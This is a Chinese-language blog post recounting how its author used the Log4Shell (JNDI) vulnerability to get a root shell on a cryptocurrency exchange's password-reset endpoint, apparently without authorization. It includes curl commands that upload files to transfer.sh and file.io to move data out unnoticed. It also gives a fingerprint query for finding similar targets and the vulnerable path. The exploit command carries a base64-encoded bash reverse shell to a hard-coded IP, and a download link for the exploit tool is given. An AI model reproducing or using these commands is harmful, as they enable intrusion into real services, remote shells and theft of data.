loading...
LOG4拿下交易所
Published in:2021-10-30 | category: 渗透

注:图片需要用到全局代理进行显示

因为在渗透过程中需要用到以下的东西,所以我把他提到了开头。

# 第一种的提交方式:如果Linux能访问网站可以通过Curl直接上传,从而打包文件,避免暴露的风险。

$ curl –upload-file ./hello.txt https://transfer.sh/hello.txt

注:本方式只支持2GB文件的打包传输

https://transfer.sh/YD2SwK/hello.txt

$ transfer hello.txt

##################################################### 100.0%

https://transfer.sh/Qpkxka/hello.txt

屏幕截图 2021-12-30 002923.png

第二种方式打包不超过100MB

curl –upload-file 上传文件名 https://transfer.sh/上传文件名 2GB以内

curl -F “file=@上传文件名” https://file.io 100MB以内

前段时间LOG4不是很火么,然后我找了一些交易所,并且一个个测试,通过手工测试在位于一个交易所找回密码选项哪里出现了DNSLOG的回显,之后直接通过LOG4拿下

image-20220209163932450

鹰图语法:web.body=”/api/market/kline/trad-view

image-20220209164027505

攻击代码:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82Ni4xNTIuMTcxLjQ2Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i}” -A 66.152.171.46

攻击工具:

https://anonfiles.com/72h4Tfd6x9/JNDI-Injection-Exploit-1.0-SNAPSHOT-all_jar

屏幕截图 2021-12-29 204750.png

因为具体服务器有更改所以上面放的是旧的图片

image-20220209164254674

漏洞地点目录:/common/forgotpassword

通过screen工具在同服务器上创建两个窗口

image-20220209164402383

一个窗口是JN也就是漏洞利用监听,一个窗口是反弹的shell的监听端口

image-20220209164604315

执行LOG4命令,接下去上nc去看看

image-20220209164651000

成功反弹shell里,权限是Root权限

image-20220209164801855

不深入-学习的东西还有很多

Prev:
云存储清单
Next:
穿越边界的姿势
catalog
catalog